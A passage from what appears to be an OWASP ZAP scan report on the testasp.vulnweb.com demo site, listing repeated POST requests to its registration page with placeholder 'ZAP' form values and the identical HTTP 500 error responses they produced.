Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
